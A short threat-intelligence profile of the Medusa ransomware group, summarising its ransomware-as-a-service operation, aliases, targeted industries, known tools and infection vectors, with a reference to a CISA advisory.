Threat ActorMedusa Ransomware
Description
Unconnected to MedusaLocker or the Medusa mobile malware, Medusa ransomware began as a small, closed source group which has (from 2021) evolved into a RaaS (Ransomware-as-a-Service) affiliate operation. Medusa uses the "double extortion" method against victims whereby their data is encrypted with a threat to release it publicly if a ransom is not paid.
Medusa is known to make use of IABs (Initial Access Brokers) to obtain access to victims initially before beginning an operation. They are also known for being very aggressive, with large numbers of victims posted on a regular basis. They favor LOTL (Living Off The Land) tactics to remain hidden inside networks and tend to use a variety legitimate remote access tools to maintain their presence in victim networks.
Aliases
- White Kali
- Medusa Ransomware Operators
- FROZEN SPIDER
- Medusa Ransomware Group
- Medusa ransomware Operators
Common Vulnerabilities and Exposures
Targeted Industries
- Education
- Energy
- Finance
- Government
- Healthcare
- Manufacturing
- Retail
- Technology
- Transportation
Objectives
Data exfiltration and financial gain.
Known Tools Used
- CertUtil
- AnyDesk
- KillAVDriver
- KillAV
- Mesh Agent
- Navicat
- NetScan
- PDQ Deploy
- PDQ Inventory
- SimpleHelp
- Rclone
- Robocopy
Known Infection Vectors
- Compromised VPNs
- Exploiting CVEs
- Malicious Attachments
- Phishing Emails
- RDP Brute-Force
- Supply Chain Attacks
References
StopRansomware: Medusa Ransomware: https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-071a
